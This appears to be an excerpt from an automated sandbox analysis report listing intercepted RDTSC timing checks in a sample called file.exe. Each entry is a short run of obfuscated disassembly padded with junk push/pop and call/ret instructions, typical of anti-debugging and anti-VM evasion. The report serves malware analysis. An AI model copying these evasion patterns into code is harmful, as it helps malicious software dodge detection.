Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28789 second address: D2878D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2878D second address: D287D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0674CEBE05h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnp 00007F0674CEBE05h 0x00000012 jmp 00007F0674CEBDFFh 0x00000017 xchg eax, ebx 0x00000018 jbe 00007F0674CEBDFCh 0x0000001e mov dword ptr [ebp+12443818h], edx 0x00000024 push eax 0x00000025 jnp 00007F0674CEBE04h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D287D5 second address: D287DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D288BF second address: D288C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D288C3 second address: D288ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 je 00007F0674F129A8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0674F129B8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D289AA second address: D289C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0674CEBDFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D289C5 second address: D289CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D289CA second address: D289D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0674CEBDF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28E1B second address: D28E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D292F5 second address: D29302 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0674CEBDF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D29302 second address: D29308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D29308 second address: D293A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F0674CEBDFEh 0x0000000d push eax 0x0000000e je 00007F0674CEBDF6h 0x00000014 pop eax 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F0674CEBDF8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 jmp 00007F0674CEBE05h 0x00000037 mov si, cx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F0674CEBDF8h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+122D1887h] 0x0000005c adc di, 539Eh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F0674CEBE04h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D29C8B second address: D29C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B920 second address: D2B925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CE2B second address: D2CE30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CE30 second address: D2CE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F0674CEBE0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0674CEBDFEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D79F second address: D2D7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0674F129A8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, 1FCA5D60h 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1245958Ah], ecx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F0674F129A8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push ebx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 pop ebx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D59B second address: D2D59F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D7FA second address: D2D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0674F129A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D59F second address: D2D5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E241 second address: D2E2C7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0674F129BCh 0x00000008 jmp 00007F0674F129B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D1BADh], edx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2AC6h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F0674F129A8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a xchg eax, ebx 0x0000003b jl 00007F0674F129C5h 0x00000041 pushad 0x00000042 jmp 00007F0674F129B7h 0x00000047 jo 00007F0674F129A6h 0x0000004d popad 0x0000004e push eax 0x0000004f jl 00007F0674F129B4h 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E2C7 second address: D2E2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D30F81 second address: D30FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0674F129AFh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D30FA1 second address: D30FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D31037 second address: D31049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D31049 second address: D3105F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674CEBE02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3105F second address: D31063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D31063 second address: D3107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b je 00007F0674CEBDF6h 0x00000011 pop esi 0x00000012 jbe 00007F0674CEBDFCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D331FA second address: D33240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F0674F129A8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2DDCh], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F0674F129A8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 add bl, FFFFFFA1h 0x00000034 push 00000000h 0x00000036 movzx ebx, si 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33240 second address: D3324A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0674CEBDF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3120E second address: D31213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D32259 second address: D3225D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D34F83 second address: D34F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D35F5B second address: D35F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub edi, 71F6D875h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D33C6h], eax 0x00000019 push 00000000h 0x0000001b mov ebx, esi 0x0000001d xchg eax, esi 0x0000001e jmp 00007F0674CEBE07h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jbe 00007F0674CEBDF6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D35F9A second address: D35F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37028 second address: D37044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE02h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D361BF second address: D361D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jo 00007F0674F129B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D35153 second address: D35157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D39E9C second address: D39EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3AEC9 second address: D3AECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D380F1 second address: D380FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3AECD second address: D3AEE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0674CEBDFFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D380FB second address: D38105 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0674F129ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DE7B second address: D3DE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DE81 second address: D3DE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3DE85 second address: D3DE89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3FEF3 second address: D3FEF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3FEF9 second address: D3FEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3FEFF second address: D3FF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3FF05 second address: D3FF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D404EE second address: D404F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A069 second address: D3A085 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0674CEBDFBh 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e ja 00007F0674CEBDFCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3BFC1 second address: D3BFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D406D7 second address: D406ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D406ED second address: D406F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D406F7 second address: D407A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE01h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d movsx ebx, bx 0x00000010 pop edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0674CEBDF8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D2C02h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov bl, C6h 0x00000041 mov eax, dword ptr [ebp+122D1315h] 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F0674CEBDF8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 mov dword ptr [ebp+12452D6Ch], ebx 0x00000067 push FFFFFFFFh 0x00000069 jmp 00007F0674CEBE03h 0x0000006e nop 0x0000006f jmp 00007F0674CEBDFDh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 ja 00007F0674CEBDFCh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D39074 second address: D39079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3912F second address: D39133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2278 second address: CE227E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48CD1 second address: D48CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48E7A second address: D48E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DF1A second address: D4DF20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DF20 second address: D4DF47 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0674F129BAh 0x00000008 jmp 00007F0674F129B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DF47 second address: D4DF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E324 second address: D5E329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E329 second address: D5E335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0674CEBDF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CE3E second address: D5CE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CFAE second address: D5CFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CFB2 second address: D5CFC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F0674F129A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CFC0 second address: D5D001 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0674CEBDFEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F0674CEBE0Ch 0x00000014 je 00007F0674CEBDFEh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D001 second address: D5D013 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0674F129A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F0674F129A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D013 second address: D5D017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D321 second address: D5D327 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D4AF second address: D5D4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D8C9 second address: D5D8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DA57 second address: D5DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE06h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0674CEBDF6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB38 second address: D0DB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674F129B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E182 second address: D5E192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0674CEBE02h 0x00000008 js 00007F0674CEBDF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E192 second address: D5E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D62D03 second address: D62D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D62D09 second address: D62D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674F129B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D24C0B second address: D24C45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBE09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007F0674CEBE03h 0x00000011 jmp 00007F0674CEBDFDh 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F0674CEBDF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D24D81 second address: D24D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D24D8A second address: D24D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25402 second address: D25408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25473 second address: D25493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0674CEBE08h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D257EC second address: D257F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D257F0 second address: D25847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBE05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b movzx ecx, dx 0x0000000e push 00000004h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F0674CEBDF8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a nop 0x0000002b jnp 00007F0674CEBE00h 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jc 00007F0674CEBDF6h 0x0000003b rdtsc
